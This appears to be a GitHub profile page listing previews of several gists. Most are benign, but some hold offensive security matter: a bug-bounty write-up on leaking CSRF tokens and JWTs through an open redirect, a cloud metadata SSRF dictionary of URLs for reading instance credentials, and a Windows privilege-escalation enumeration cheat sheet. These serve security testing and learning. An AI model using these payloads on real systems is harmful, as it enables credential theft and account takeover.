Skip to content

Instantly share code, notes, and snippets.

View janmasarik's full-sized avatar

jan.masarik janmasarik

91 followers · 10 following
View GitHub Profile
@stefanocoding
stefanocoding / csrf_jwt_redirect_leak.md
Created May 15, 2019 23:46

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

  1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
  2. User loads https://example.com/?code=VALUE
  3. Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user 
    GET /verify/VALUE HTTP/1.1
Host: example.com
@trishume
trishume / Flagsifier.ipynb
Created May 14, 2018 02:45
DEF CON Quals 2018 Flagsifier Notebook
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@gleicon
gleicon / list_objects_google_storage_boto3.py
Last active October 11, 2023 14:27
How to use boto3 with google cloud storage and python to emulate s3 access.
from boto3.session import Session
from botocore.client import Config
from botocore.handlers import set_list_objects_encoding_type_url
import boto3
ACCESS_KEY = "xx"
SECRET_KEY = "yy"
boto3.set_stream_logger('')
@BuffaloWill
BuffaloWill / cloud_metadata.txt
Last active April 16, 2024 04:15
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@joepie91
joepie91 / vpn.md
Last active April 20, 2024 21:15
Don't use VPN services.

Don't use VPN services.

No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.

Note: The content in this post does not apply to using VPN for their intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.

  • A Russian translation of this article can be found here, contributed by Timur Demin.
  • A Turkish translation can be found here, contributed by agyild.
  • There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.
@squarism
squarism / iterm2.md
Last active April 25, 2024 03:50
An iTerm2 Cheatsheet

Tabs and Windows

Function Shortcut
New Tab + T
Close Tab or Window + W (same as many mac apps)
Go to Tab + Number Key (ie: ⌘2 is 2nd tab)
Go to Split Pane by Direction + Option + Arrow Key
Cycle iTerm Windows + backtick (true of all mac apps and works with desktops/mission control)
@sckalath
sckalath / windows_privesc
Last active January 12, 2024 12:09
Windows Privilege Escalation
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
// Get the hostname and username (if available)
hostname
echo %username%
// Get users
net users
net user [username]